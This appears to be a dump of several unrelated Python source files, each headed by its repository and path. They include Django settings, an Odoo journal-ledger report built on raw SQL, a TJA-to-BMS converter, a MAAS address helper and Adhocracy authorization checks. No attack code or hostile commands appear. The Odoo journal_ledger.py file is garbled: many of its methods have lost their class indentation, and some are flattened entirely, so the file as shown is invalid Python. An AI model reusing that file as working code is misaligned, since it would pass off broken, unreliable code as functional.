STATICFILES_DIRS = [os.path.join(BASE_DIR, 'antxetamedia/static')]
STATICFILES_FINDERS = [
    'compressor.finders.CompressorFinder',
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]

# Celery: in-process eager execution with the Django database broker.
BROKER_URL = 'django://'
CELERY_ALWAYS_EAGER = True
CELERY_TASK_SERIALIZER = 'json'
CELERY_ACCEPT_CONTENT = ['json']

COMPRESS_PRECOMPILERS = [('text/x-sass', 'django_libsass.SassCompiler')]

# CKEditor rich-text editor configuration.
CKEDITOR_JQUERY_URL = os.path.join(STATIC_URL, 'bower_components/jquery/dist/jquery.min.js')
CKEDITOR_UPLOAD_PATH = 'ckeditor/'
CKEDITOR_IMAGE_BACKEND = 'pillow'
CKEDITOR_CONFIGS = {
    'default': {
        'extraPlugins': 'iframe,autoembed',
        'toolbar': [
            ['Format', 'Bold', 'Italic', 'Underline', 'StrikeThrough', '-',
             'NumberedList', 'BulletedList', '-', 'Outdent', 'Indent', '-', 'JustifyLeft', 'JustifyCenter',
             'JustifyRight', 'JustifyBlock'],
            ['Image', 'Link', 'Iframe', 'Source'],
            ['Undo', 'Redo', '-', 'Cut', 'Copy', 'Paste', 'Find', 'Replace', '-', 'Print'],
        ],
    }
}

# Grappelli admin skin.
GRAPPELLI_INDEX_DASHBOARD = 'antxetamedia.dashboard.AntxetamediaDashboard'
GRAPPELLI_ADMIN_TITLE = 'Antxetamedia'
GRAPPELLI_SWITCH_USER = True
GRAPPELLI_CLEAN_INPUT_TYPES = False

FORMAT_MODULE_PATH = 'antxetamedia.formats'

DATA_UPLOAD_MAX_MEMORY_SIZE = None  # Disable upload size limits

# Project-specific settings.
FRONTPAGE_NEWSPODCASTS = 5
FRONTPAGE_RADIOPODCASTS = 10
FRONTPAGE_EVENTS = 5

NEWSCATEGORIES_COOKIE = 'newscategories'
RADIOSHOWS_COOKIE = 'radioshows'

SYNC_BLOBS = False
|
BT-astauder/account-financial-reporting
|
account_financial_report/report/journal_ledger.py
|
# Copyright 2017 ACSONE SA/NV
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models, fields, api
DIGITS = (16, 2)  # (total, decimal) digit precision — presumably for monetary fields; TODO confirm usage
class ReportJournalLedger(models.TransientModel):
    """Transient container for the Journal Ledger report.

    The related report_journal_ledger_* rows are filled with raw SQL
    INSERTs (see compute_data_for_report) for performance.
    """
    _name = 'report_journal_ledger'

    # Reporting period, both bounds inclusive.
    date_from = fields.Date(
        required=True
    )
    date_to = fields.Date(
        required=True
    )
    company_id = fields.Many2one(
        comodel_name='res.company',
        required=True,
        ondelete='cascade'
    )
    # Which moves to include (selection shared with the launch wizard).
    move_target = fields.Selection(
        selection='_get_move_targets',
        default='all',
        required=True,
    )
    sort_option = fields.Selection(
        selection='_get_sort_options',
        default='move_name',
        required=True,
    )
    group_option = fields.Selection(
        selection='_get_group_options',
        default='journal',
        required=True,
    )
    journal_ids = fields.Many2many(
        comodel_name='account.journal',
        required=True,
    )
    # Computed report lines, one model per level of detail.
    report_journal_ledger_ids = fields.One2many(
        comodel_name='report_journal_ledger_journal',
        inverse_name='report_id',
    )
    report_move_ids = fields.One2many(
        comodel_name='report_journal_ledger_move',
        inverse_name='report_id',
    )
    report_move_line_ids = fields.One2many(
        comodel_name='report_journal_ledger_move_line',
        inverse_name='report_id',
    )
    report_journal_ledger_tax_line_ids = fields.One2many(
        comodel_name='report_journal_ledger_journal_tax_line',
        inverse_name='report_id',
    )
    report_tax_line_ids = fields.One2many(
        comodel_name='report_journal_ledger_report_tax_line',
        inverse_name='report_id',
    )
    # Rendering options.
    foreign_currency = fields.Boolean()
    with_account_name = fields.Boolean()
@api.model
def _get_move_targets(self):
    # Selection values are shared with the launching wizard.
    return self.env['journal.ledger.report.wizard']._get_move_targets()
@api.model
def _get_sort_options(self):
    # Selection values are shared with the launching wizard.
    return self.env['journal.ledger.report.wizard']._get_sort_options()
@api.model
def _get_group_options(self):
    # Selection values are shared with the launching wizard.
    return self.env['journal.ledger.report.wizard']._get_group_options()
@api.multi
def compute_data_for_report(self):
    """Compute every report table with raw SQL, in dependency order:
    journals, then moves, move lines and tax lines."""
    self.ensure_one()
    self._inject_journal_values()
    self._inject_move_values()
    self._inject_move_line_values()
    self._inject_journal_tax_values()
    self._update_journal_report_total_values()

    if self.group_option == 'none':
        self._inject_report_tax_values()

    # Refresh cache because all data are computed with SQL requests
    self.invalidate_cache()
@api.multi
def _inject_journal_values(self):
    """Fill report_journal_ledger_journal with one row per selected
    journal of the report company, ordered by journal name.

    Previous rows of this report are deleted first, so the method is
    idempotent.
    """
    self.ensure_one()
    # Clean any previous computation for this report.
    sql = """
        DELETE
        FROM report_journal_ledger_journal
        WHERE report_id = %s
    """
    params = (
        self.id,
    )
    self.env.cr.execute(sql, params)
    sql = """
        INSERT INTO report_journal_ledger_journal (
            create_uid,
            create_date,
            report_id,
            journal_id,
            name,
            code,
            company_id,
            currency_id
        )
        SELECT
            %s as create_uid,
            NOW() as create_date,
            %s as report_id,
            aj.id as journal_id,
            aj.name as name,
            aj.code as code,
            aj.company_id as company_id,
            COALESCE(aj.currency_id, company.currency_id) as currency_id
        FROM
            account_journal aj
        LEFT JOIN
            res_company company on (company.id = aj.company_id)
        WHERE
            aj.id in %s
        AND
            aj.company_id = %s
        ORDER BY
            aj.name
    """
    params = (
        self.env.uid,
        self.id,
        tuple(self.journal_ids.ids),
        self.company_id.id,
    )
    self.env.cr.execute(sql, params)
@api.multi
def _inject_move_values(self):
    """Fill report_journal_ledger_move for this report, assembling
    the INSERT/SELECT/WHERE/ORDER BY pieces from the dedicated helper
    methods so subclasses can override each part."""
    self.ensure_one()
    # Clean any previous computation for this report.
    sql = """
        DELETE
        FROM report_journal_ledger_move
        WHERE report_id = %s
    """
    params = (
        self.id,
    )
    self.env.cr.execute(sql, params)
    sql = self._get_inject_move_insert()
    sql += self._get_inject_move_select()
    sql += self._get_inject_move_where_clause()
    sql += self._get_inject_move_order_by()
    params = self._get_inject_move_params()
    self.env.cr.execute(sql, params)
    @api.multi
    def _get_inject_move_insert(self):
        """Return the INSERT clause used by _inject_move_values()."""
        return """
            INSERT INTO report_journal_ledger_move (
                create_uid,
                create_date,
                report_id,
                report_journal_ledger_id,
                move_id,
                name,
                company_id
            )
        """
    @api.multi
    def _get_inject_move_select(self):
        """Return the SELECT/FROM clause used by _inject_move_values()."""
        return """
            SELECT
                %s as create_uid,
                NOW() as create_date,
                rjqj.report_id as report_id,
                rjqj.id as report_journal_ledger_id,
                am.id as move_id,
                am.name as name,
                am.company_id as company_id
            FROM
                account_move am
            INNER JOIN
                report_journal_ledger_journal rjqj
                    on (rjqj.journal_id = am.journal_id)
        """
    @api.multi
    def _get_inject_move_where_clause(self):
        """Return the WHERE clause used by _inject_move_values().

        Filters by report and date range and, unless all moves were
        requested, by move state (parameter appended by
        _get_inject_move_params()).
        """
        self.ensure_one()
        where_clause = """
            WHERE
                rjqj.report_id = %s
            AND
                am.date >= %s
            AND
                am.date <= %s
        """
        if self.move_target != 'all':
            where_clause += """
                AND
                    am.state = %s
            """
        return where_clause
    @api.multi
    def _get_inject_move_order_by(self):
        """Return the ORDER BY clause matching the report's sort option."""
        self.ensure_one()
        order_by = """
            ORDER BY
        """
        # NOTE(review): if sort_option is neither of these values the clause
        # stays a bare "ORDER BY" (invalid SQL). The selection presumably
        # only allows these two values — confirm against _get_sort_options().
        if self.sort_option == 'move_name':
            order_by += " am.name"
        elif self.sort_option == 'date':
            order_by += " am.date, am.name"
        return order_by
@api.multi
def _get_inject_move_params(self):
params = [
self.env.uid,
self.id,
self.date_from,
self.date_to
]
if self.move_target != 'all':
params.append(self.move_target)
return tuple(params)
@api.multi
def _inject_move_line_values(self):
self.ensure_one()
sql = """
DELETE
FROM report_journal_ledger_move_line
WHERE report_id = %s
"""
params = (
self.id,
)
self.env.cr.execute(sql, params)
sql = """
INSERT INTO report_journal_ledger_move_line (
create_uid,
create_date,
report_id,
report_journal_ledger_id,
report_move_id,
move_line_id,
account_id,
account,
account_code,
account_type,
partner_id,
partner,
date,
entry,
label,
debit,
credit,
company_currency_id,
amount_currency,
currency_id,
currency_name,
tax_id,
taxes_description,
company_id
)
SELECT
%s as create_uid,
NOW() as create_date,
rjqm.report_id as report_id,
rjqm.report_journal_ledger_id as report_journal_ledger_id,
rjqm.id as report_move_id,
aml.id as move_line_id,
aml.account_id as account_id,
aa.name as account,
aa.code as account_code,
aa.internal_type as account_type,
aml.partner_id as partner_id,
p.name as partner,
aml.date as date,
rjqm.name as entry,
aml.name as label,
aml.debit as debit,
aml.credit as credit,
aml.company_currency_id as currency_id,
aml.amount_currency as amount_currency,
aml.currency_id as currency_id,
currency.name as currency_name,
aml.tax_line_id as tax_id,
CASE
WHEN
aml.tax_line_id is not null
THEN
COALESCE(at.description, at.name)
WHEN
aml.tax_line_id is null
THEN
(SELECT
array_to_string(
array_agg(COALESCE(at.description, at.name)
), ', ')
FROM
account_move_line_account_tax_rel aml_at_rel
LEFT JOIN
account_tax at on (at.id = aml_at_rel.account_tax_id)
WHERE
aml_at_rel.account_move_line_id = aml.id)
ELSE
''
END as taxes_description,
aml.company_id as company_id
FROM
account_move_line aml
INNER JOIN
report_journal_ledger_move rjqm
on (rjqm.move_id = aml.move_id)
LEFT JOIN
account_account aa
on (aa.id = aml.account_id)
LEFT JOIN
res_partner p
on (p.id = aml.partner_id)
LEFT JOIN
account_tax at
on (at.id = aml.tax_line_id)
LEFT JOIN
res_currency currency
on (currency.id = aml.currency_id)
WHERE
rjqm.report_id = %s
"""
params = (
self.env.uid,
self.id,
)
self.env.cr.execute(sql, params)
    @api.multi
    def _inject_report_tax_values(self):
        """Aggregate per-journal tax lines into report-level tax lines.

        For every distinct tax found in this report's journal tax lines,
        insert one report_journal_ledger_report_tax_line row whose base
        and tax debit/credit are summed over all journals.
        """
        self.ensure_one()
        # Collect the distinct taxes present in this report's journal lines.
        sql_distinct_tax_id = """
            SELECT
                distinct(jrqjtl.tax_id)
            FROM
                report_journal_ledger_journal_tax_line jrqjtl
            WHERE
                jrqjtl.report_id = %s
        """
        self.env.cr.execute(sql_distinct_tax_id, (self.id,))
        rows = self.env.cr.fetchall()
        tax_ids = set([row[0] for row in rows])
        sql = """
            INSERT INTO report_journal_ledger_report_tax_line (
                create_uid,
                create_date,
                report_id,
                tax_id,
                tax_name,
                tax_code,
                base_debit,
                base_credit,
                tax_debit,
                tax_credit
            )
            SELECT
                %s as create_uid,
                NOW() as create_date,
                %s as report_id,
                %s as tax_id,
                at.name as tax_name,
                at.description as tax_code,
                (
                    SELECT sum(base_debit)
                    FROM report_journal_ledger_journal_tax_line jrqjtl2
                    WHERE jrqjtl2.report_id = %s
                    AND jrqjtl2.tax_id = %s
                ) as base_debit,
                (
                    SELECT sum(base_credit)
                    FROM report_journal_ledger_journal_tax_line jrqjtl2
                    WHERE jrqjtl2.report_id = %s
                    AND jrqjtl2.tax_id = %s
                ) as base_credit,
                (
                    SELECT sum(tax_debit)
                    FROM report_journal_ledger_journal_tax_line jrqjtl2
                    WHERE jrqjtl2.report_id = %s
                    AND jrqjtl2.tax_id = %s
                ) as tax_debit,
                (
                    SELECT sum(tax_credit)
                    FROM report_journal_ledger_journal_tax_line jrqjtl2
                    WHERE jrqjtl2.report_id = %s
                    AND jrqjtl2.tax_id = %s
                ) as tax_credit
            FROM
                report_journal_ledger_journal_tax_line jrqjtl
            LEFT JOIN
                account_tax at
                    on (at.id = jrqjtl.tax_id)
            WHERE
                jrqjtl.report_id = %s
            AND
                jrqjtl.tax_id = %s
        """
        # One INSERT per tax; the parameter list repeats (report_id, tax_id)
        # once per %s pair in the statement above, in order.
        for tax_id in tax_ids:
            params = (
                self.env.uid,
                self.id,
                tax_id,
                self.id,
                tax_id,
                self.id,
                tax_id,
                self.id,
                tax_id,
                self.id,
                tax_id,
                self.id,
                tax_id,
            )
            self.env.cr.execute(sql, params)
    @api.multi
    def _inject_journal_tax_values(self):
        """Delete and recompute the per-journal tax summary lines.

        For each journal row of the report, find the distinct taxes used
        on its move lines and insert one tax-line row per tax with:
        base debit/credit (sum of lines the tax applies to) and tax
        debit/credit (sum of the tax's own lines).
        """
        self.ensure_one()
        sql = """
            DELETE
            FROM report_journal_ledger_journal_tax_line
            WHERE report_id = %s
        """
        params = (
            self.id,
        )
        self.env.cr.execute(sql, params)
        # Distinct taxes appearing on the move lines of one journal row.
        sql_distinct_tax_id = """
            SELECT
                distinct(jrqml.tax_id)
            FROM
                report_journal_ledger_move_line jrqml
            WHERE
                jrqml.report_journal_ledger_id = %s
        """
        tax_ids_by_journal_id = {}
        for report_journal in self.report_journal_ledger_ids:
            if report_journal.id not in tax_ids_by_journal_id:
                tax_ids_by_journal_id[report_journal.id] = []
            self.env.cr.execute(sql_distinct_tax_id, (report_journal.id,))
            rows = self.env.cr.fetchall()
            # NULL tax ids are filtered out (lines without a tax).
            tax_ids_by_journal_id[report_journal.id].extend([
                row[0] for row in rows if row[0]
            ])
        sql = """
            INSERT INTO report_journal_ledger_journal_tax_line (
                create_uid,
                create_date,
                report_id,
                report_journal_ledger_id,
                tax_id,
                tax_name,
                tax_code,
                base_debit,
                base_credit,
                tax_debit,
                tax_credit
            )
            SELECT
                %s as create_uid,
                NOW() as create_date,
                %s as report_id,
                %s as report_journal_ledger_id,
                %s as tax_id,
                at.name as tax_name,
                at.description as tax_code,
                (
                    SELECT sum(debit)
                    FROM report_journal_ledger_move_line jrqml2
                    WHERE jrqml2.report_journal_ledger_id = %s
                    AND (
                        SELECT
                            count(*)
                        FROM
                            account_move_line_account_tax_rel aml_at_rel
                        WHERE
                            aml_at_rel.account_move_line_id =
                                jrqml2.move_line_id
                            AND
                                aml_at_rel.account_tax_id = %s
                    ) > 0
                ) as base_debit,
                (
                    SELECT sum(credit)
                    FROM report_journal_ledger_move_line jrqml2
                    WHERE jrqml2.report_journal_ledger_id = %s
                    AND (
                        SELECT
                            count(*)
                        FROM
                            account_move_line_account_tax_rel aml_at_rel
                        WHERE
                            aml_at_rel.account_move_line_id =
                                jrqml2.move_line_id
                            AND
                                aml_at_rel.account_tax_id = %s
                    ) > 0
                ) as base_credit,
                (
                    SELECT sum(debit)
                    FROM report_journal_ledger_move_line jrqml2
                    WHERE jrqml2.report_journal_ledger_id = %s
                    AND jrqml2.tax_id = %s
                ) as tax_debit,
                (
                    SELECT sum(credit)
                    FROM report_journal_ledger_move_line jrqml2
                    WHERE jrqml2.report_journal_ledger_id = %s
                    AND jrqml2.tax_id = %s
                ) as tax_credit
            FROM
                report_journal_ledger_journal rjqj
            LEFT JOIN
                account_tax at
                    on (at.id = %s)
            WHERE
                rjqj.id = %s
        """
        # One INSERT per (journal row, tax); the parameter order mirrors
        # the %s placeholders in the statement above.
        for report_journal_ledger_id in tax_ids_by_journal_id:
            tax_ids = tax_ids_by_journal_id[report_journal_ledger_id]
            for tax_id in tax_ids:
                params = (
                    self.env.uid,
                    self.id,
                    report_journal_ledger_id,
                    tax_id,
                    report_journal_ledger_id,
                    tax_id,
                    report_journal_ledger_id,
                    tax_id,
                    report_journal_ledger_id,
                    tax_id,
                    report_journal_ledger_id,
                    tax_id,
                    tax_id,
                    report_journal_ledger_id,
                )
                self.env.cr.execute(sql, params)
    @api.multi
    def _update_journal_report_total_values(self):
        """Fill each journal row's debit/credit totals from its move lines."""
        self.ensure_one()
        sql = """
            UPDATE
                report_journal_ledger_journal rjqj
            SET
                debit = (
                    SELECT sum(rjqml.debit)
                    FROM report_journal_ledger_move_line rjqml
                    WHERE rjqml.report_journal_ledger_id = rjqj.id
                ),
                credit = (
                    SELECT sum(rjqml.credit)
                    FROM report_journal_ledger_move_line rjqml
                    WHERE rjqml.report_journal_ledger_id = rjqj.id
                )
            WHERE
                rjqj.report_id = %s
        """
        self.env.cr.execute(sql, (self.id,))
@api.multi
def print_report(self, report_type):
self.ensure_one()
if report_type == 'xlsx':
report_name = 'a_f_r.report_journal_ledger_xlsx'
else:
report_name = 'account_financial_report.' \
'report_journal_ledger_qweb'
return self.env['ir.actions.report'].search(
[('report_name', '=', report_name),
('report_type', '=', report_type)], limit=1).report_action(self)
    def _get_html(self):
        """Render the journal-ledger QWeb template for the active report.

        Reads the report id from context key 'active_id'; returns a dict
        with an 'html' key (absent when no report was found).
        """
        result = {}
        rcontext = {}
        context = dict(self.env.context)
        report = self.browse(context.get('active_id'))
        if report:
            rcontext['o'] = report
            result['html'] = self.env.ref(
                'account_financial_report.report_journal_ledger').render(
                rcontext)
        return result
    @api.model
    def get_html(self, given_context=None):
        """Public wrapper around _get_html(); *given_context* is unused here."""
        return self._get_html()
class ReportJournalLedgerJournal(models.TransientModel):
    """One journal shown in a Journal Ledger report (transient row)."""
    _name = 'report_journal_ledger_journal'
    name = fields.Char(
        required=True,
    )
    code = fields.Char()
    report_id = fields.Many2one(
        comodel_name='report_journal_ledger',
        required=True,
        ondelete='cascade'
    )
    journal_id = fields.Many2one(
        comodel_name='account.journal',
        required=True,
        ondelete='cascade',
    )
    report_move_ids = fields.One2many(
        comodel_name='report_journal_ledger_move',
        inverse_name='report_journal_ledger_id',
    )
    report_tax_line_ids = fields.One2many(
        comodel_name='report_journal_ledger_journal_tax_line',
        inverse_name='report_journal_ledger_id',
    )
    # Journal totals, filled by _update_journal_report_total_values().
    debit = fields.Float(
        digits=DIGITS,
    )
    credit = fields.Float(
        digits=DIGITS,
    )
    company_id = fields.Many2one(
        comodel_name='res.company',
        required=True,
        ondelete='cascade'
    )
    currency_id = fields.Many2one(
        comodel_name='res.currency',
    )
class ReportJournalLedgerMove(models.TransientModel):
    """One account move (journal entry) of a Journal Ledger report."""
    _name = 'report_journal_ledger_move'
    report_id = fields.Many2one(
        comodel_name='report_journal_ledger',
        required=True,
        ondelete='cascade'
    )
    report_journal_ledger_id = fields.Many2one(
        comodel_name='report_journal_ledger_journal',
        required=True,
        ondelete='cascade',
    )
    move_id = fields.Many2one(
        comodel_name='account.move',
        required=True,
        ondelete='cascade',
    )
    report_move_line_ids = fields.One2many(
        comodel_name='report_journal_ledger_move_line',
        inverse_name='report_move_id',
    )
    name = fields.Char()
    company_id = fields.Many2one(
        comodel_name='res.company',
        required=True,
        ondelete='cascade'
    )
class ReportJournalLedgerMoveLine(models.TransientModel):
    """One account move line of a Journal Ledger report.

    Denormalized copy of the account.move.line data used by the report
    (account, partner, currency and tax information are stored as plain
    columns, filled by raw SQL in _inject_move_line_values()).
    """
    _name = 'report_journal_ledger_move_line'
    _order = 'partner_id desc, account_id desc'
    report_id = fields.Many2one(
        comodel_name='report_journal_ledger',
        required=True,
        ondelete='cascade'
    )
    report_journal_ledger_id = fields.Many2one(
        comodel_name='report_journal_ledger_journal',
        required=True,
        ondelete='cascade',
    )
    report_move_id = fields.Many2one(
        comodel_name='report_journal_ledger_move',
        required=True,
        ondelete='cascade',
    )
    move_line_id = fields.Many2one(
        comodel_name='account.move.line',
        required=True,
        ondelete='cascade',
    )
    account_id = fields.Many2one(
        comodel_name='account.account'
    )
    account = fields.Char()
    account_code = fields.Char()
    account_type = fields.Char()
    partner = fields.Char()
    partner_id = fields.Many2one(
        comodel_name='res.partner',
    )
    date = fields.Date()
    entry = fields.Char()
    label = fields.Char()
    debit = fields.Float(
        digits=DIGITS,
    )
    credit = fields.Float(
        digits=DIGITS,
    )
    company_currency_id = fields.Many2one(
        comodel_name='res.currency',
    )
    # amount_currency is expressed in currency_id (the line's currency).
    amount_currency = fields.Monetary(
        currency_field='currency_id',
    )
    currency_id = fields.Many2one(
        comodel_name='res.currency',
    )
    currency_name = fields.Char()
    taxes_description = fields.Char()
    tax_id = fields.Many2one(
        comodel_name='account.tax'
    )
    company_id = fields.Many2one(
        comodel_name='res.company',
        required=True,
        ondelete='cascade'
    )
class ReportJournalLedgerReportTaxLine(models.TransientModel):
    """Report-wide tax totals; also the base model the per-journal tax
    line inherits from (see ReportJournalLedgerJournalTaxLine)."""
    _name = 'report_journal_ledger_report_tax_line'
    _order = 'tax_code'
    report_id = fields.Many2one(
        comodel_name='report_journal_ledger',
        required=True,
        ondelete='cascade'
    )
    tax_id = fields.Many2one(
        comodel_name='account.tax'
    )
    tax_name = fields.Char()
    tax_code = fields.Char()
    base_debit = fields.Float(
        digits=DIGITS,
    )
    base_credit = fields.Float(
        digits=DIGITS,
    )
    base_balance = fields.Float(
        digits=DIGITS,
        compute='_compute_base_balance',
    )
    tax_debit = fields.Float(
        digits=DIGITS,
    )
    tax_credit = fields.Float(
        digits=DIGITS,
    )
    tax_balance = fields.Float(
        digits=DIGITS,
        compute='_compute_tax_balance'
    )
    @api.multi
    def _compute_base_balance(self):
        # Accounting convention: balance = debit - credit.
        for rec in self:
            rec.base_balance = rec.base_debit - rec.base_credit
    @api.multi
    def _compute_tax_balance(self):
        for rec in self:
            rec.tax_balance = rec.tax_debit - rec.tax_credit
class ReportJournalLedgerJournalTaxLine(models.TransientModel):
    """Per-journal tax totals; fields inherited from the report tax line."""
    _name = 'report_journal_ledger_journal_tax_line'
    _inherit = 'report_journal_ledger_report_tax_line'
    _order = 'tax_code'
    report_journal_ledger_id = fields.Many2one(
        comodel_name='report_journal_ledger_journal',
        required=True,
        ondelete='cascade',
    )
|
Saren-Arterius/textage2bms
|
tja2bms.py
|
#!/usr/bin/env python3
from tja_info import *
from sys import argv, stderr
if __name__ == '__main__':
    # Convert a .tja (Taiko) chart given as argv[1] to BMS text on stdout.
    info = None
    # Course/difficulty to convert; default 3 (Oni), optionally overridden
    # by argv[2].
    parse_level = 3
    try:
        parse_level = TJAInfo.parse_course(argv[2])
    except Exception:
        pass
    # Try the encodings commonly used for .tja files until one parses.
    for codec in ['utf-8', 'shift-jis', 'gbk']:
        try:
            # BUG FIX: the encoding was hard-coded to 'gbk', so the
            # utf-8 / shift-jis attempts never actually happened.
            with open(argv[1], encoding=codec) as d:
                info = TJAInfo(d.read())
            break
        except Exception:
            pass
    if not info:
        print('Could not parse', argv[1], file=stderr)
        exit(1)
    print(f'Parse level {parse_level} of {argv[1]}', file=stderr)
    # BMS header section, mostly copied/derived from the TJA headers.
    headers = {
        '#PLAYER': '1',
        '#RANK': '3',
        '#DIFFICULTY': '4',
        '#STAGEFILE': '',
        '#GENRE': info.headers['SUBTITLE'],
        '#TITLE': '[TJA] ' + info.headers['TITLE'],
        '#ARTIST': 'TJA',
        '#BPM': info.headers['BPM'],
        '#PLAYLEVEL': info.headers['LEVELS'][3],
        '#WAV02': 'out.wav',
        '#WAVDD': 'dong.wav',
        '#WAVCC': 'ka.wav',
    }
    print('*---------------------- HEADER FIELD')
    for k, v in headers.items():
        print(k, v)
    print('\n*---------------------- MAIN DATA FIELD\n#00001:02\n')
    # Translate the TJA OFFSET into an initial STOP, measured in 1/192ths
    # of one 4/4 section at the base BPM (minus the two lead-in sections).
    section_seconds = 4 * (60 / float(info.headers['BPM']))
    measure_seconds = section_seconds / 192
    stop_count = round(-float(info.headers['OFFSET']) / measure_seconds) - (2 * 192)
    print(f'#STOP01 {stop_count}')
    print('#00009:01')
    # Emit the note channels. Small notes alternate between right- and
    # left-hand channels (small_notes_counter parity).
    small_notes_counter = 0
    for s_num, s in enumerate(info.beatmaps[parse_level]):
        s_num = s_num + 2
        notes = tuple(filter(lambda o: isinstance(o, NoteTypes), s))
        rr_notes = ['00'] * len(notes)
        rl_notes = ['00'] * len(notes)
        br_notes = ['00'] * len(notes)
        bl_notes = ['00'] * len(notes)
        for t, n in enumerate(notes):
            if n == NoteTypes.BIG_RED:
                # Big notes hit both hands at once.
                rr_notes[t], rl_notes[t] = 'DD', 'DD'
            elif n == NoteTypes.BIG_BLUE:
                br_notes[t], bl_notes[t] = 'CC', 'CC'
            else:
                sel_notes = None
                if n == NoteTypes.RED:
                    sel_notes = rr_notes if small_notes_counter % 2 == 0 else rl_notes
                elif n == NoteTypes.BLUE:
                    sel_notes = br_notes if small_notes_counter % 2 == 0 else bl_notes
                else:
                    continue
                sel_notes[t] = 'DD' if n == NoteTypes.RED else 'CC'
                small_notes_counter += 1
        m = {12: bl_notes, 13: rl_notes, 15: rr_notes, 18: br_notes}
        for channel, ch_notes in m.items():
            # Skip channels that have no audible notes in this section.
            if not len(ch_notes) or all(map(lambda n: n == '00', ch_notes)):
                continue
            print('#{:03d}{}:{}'.format(s_num, channel, ''.join(ch_notes)))
    # Emit measure (time-signature, channel 02) and BPM-change (channel 08)
    # data in a second pass over the beatmap.
    current_measure = 1
    bpm_change_counter = 1
    for s_num, s in enumerate(info.beatmaps[parse_level]):
        s_num = s_num + 2
        non_notes = tuple(filter(lambda o: not isinstance(o, NoteTypes), s))
        measures = tuple(filter(lambda o: isinstance(o, Measure), non_notes))
        if len(measures):
            current_measure = measures[0].value.numerator / measures[0].value.denominator
        if current_measure != 1:
            print('#{:03d}02:{}'.format(s_num, current_measure))
        bpm_changes = tuple(filter(lambda o: isinstance(o, BPMChange), non_notes))
        bpm_channel_notes = []
        for c in bpm_changes:
            print('#BPM{:02d}:{}'.format(bpm_change_counter, c.new_bpm))
            bpm_channel_notes.append('{:02d}'.format(bpm_change_counter))
            bpm_change_counter += 1
        if bpm_channel_notes:
            print('#{:03d}08:{}'.format(s_num, ''.join(bpm_channel_notes)))
|
cloudbase/maas
|
src/metadataserver/address.py
|
# Copyright 2012 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Figure out server address for the maas_url setting."""
from __future__ import (
absolute_import,
print_function,
unicode_literals,
)
str = None
__metaclass__ = type
__all__ = [
'guess_server_address',
]
from fcntl import ioctl
from os import environ
import re
import socket
import struct
from subprocess import check_output
from metadataserver import logger
# fcntl operation as defined in <ioctls.h>. This is GNU/Linux-specific!
SIOCGIFADDR = 0x8915
def get_command_output(*command_line):
    """Execute a command line, and return its output.

    Raises an exception if return value is nonzero.

    :param *command_line: Words for the command line. No shell expansions
        are performed.
    :type *command_line: Sequence of unicode.
    :return: Output from the command.
    :rtype: List of unicode, one per line.
    """
    # Run with a scrubbed locale so the output is parseable: drop every
    # inherited LC_* variable, then force a C locale.
    env = dict(
        item for item in environ.items() if not item[0].startswith('LC_')
    )
    env['LC_ALL'] = 'C'
    env['LANG'] = 'en_US.UTF-8'
    return check_output(command_line, env=env).splitlines()
def find_default_interface(ip_route_output):
    """Find the network interface used for the system's default route.

    If no default is found, makes a guess.

    :param ip_route_output: Output lines from "ip route show" output.
    :type ip_route_output: Sequence of unicode.
    :return: unicode, or None.
    """
    route_lines = list(ip_route_output)
    # Raw strings for the patterns: '\s' and '\w' are invalid escape
    # sequences in ordinary literals (DeprecationWarning, and an error in
    # future Python versions).
    for line in route_lines:
        match = re.match(r'default\s+.*\sdev\s+(\w+)', line)
        if match is not None:
            return match.group(1)
    # Still nothing? Try the first recognizable interface in the list.
    for line in route_lines:
        match = re.match(r'\s*(?:\S+\s+)*dev\s+(\w+)', line)
        if match is not None:
            return match.group(1)
    return None
def get_ip_address(interface):
    """Get the IP address for a given network interface."""
    # Apparently the netifaces module would do this for us.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # The kernel interface-name buffer is 16 bytes; truncate accordingly.
    packed_name = struct.pack(b'256s', interface[:15])
    try:
        request = ioctl(sock.fileno(), SIOCGIFADDR, packed_name)
    except IOError as error:
        logger.warn(
            "Could not determine address for apparent default interface %s "
            "(%s)"
            % (interface, error))
        return None
    # Bytes 20..24 of the ifreq struct hold the IPv4 address.
    return socket.inet_ntoa(request[20:24])
def guess_server_address():
    """Make a guess as to this server's IP address."""
    route_lines = get_command_output(
        '/bin/ip', '-oneline', 'route', 'show')
    interface = find_default_interface(route_lines)
    if interface is not None:
        return get_ip_address(interface)
    # No usable interface found; fall back to the hostname.
    return socket.gethostname()
|
etesync/journal-manager
|
journal/apps.py
|
# Copyright © 2017 Tom Hacohen
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, version 3.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.apps import AppConfig
class JournalConfig(AppConfig):
    """Django application configuration for the 'journal' app."""
    name = 'journal'
|
SysTheron/adhocracy
|
src/adhocracy/lib/auth/user.py
|
from paste.deploy.converters import asbool
from pylons import tmpl_context as c, config
from adhocracy.lib.auth.authorization import has
from adhocracy.lib.auth.authorization import NOT_LOGGED_IN
def index(check):
    """Authorize listing users: requires the 'user.view' permission."""
    check.perm('user.view')
def show(check, u):
    """Authorize viewing user *u*: needs 'user.view' and *u* not deleted."""
    check.perm('user.view')
    check.other('user_deleted', u.is_deleted())
def create(check):
    """Authorize account creation: fails when someone is already logged in."""
    check.other('user_logged_in', c.user is not None)
def edit(check, u):
    """Authorize editing *u*: managers always may; otherwise only a
    logged-in user editing their own (visible) account."""
    if has('user.manage'):
        return
    show(check, u)
    check.other('user_not_self', u != c.user)
    check.other(NOT_LOGGED_IN, not c.user)
def manage(check, u):
    """Authorize administrative management of users ('user.manage')."""
    check.perm('user.manage')
def message(check, u):
    """Authorize messaging *u*: needs 'user.message', a different user,
    and *u* must have an email address."""
    check.perm('user.message')
    check.other('user_is_self', u == c.user)
    check.other('user_without_email', u.email is None)
def supervise(check, u):
    """Authorize supervising *u*: requires an instance context, *u* being
    a member of it, and user.manage or instance.admin rights."""
    check.other('not_in_instance', not c.instance)
    check.other('no_member_in_instance', not u.is_member(c.instance))
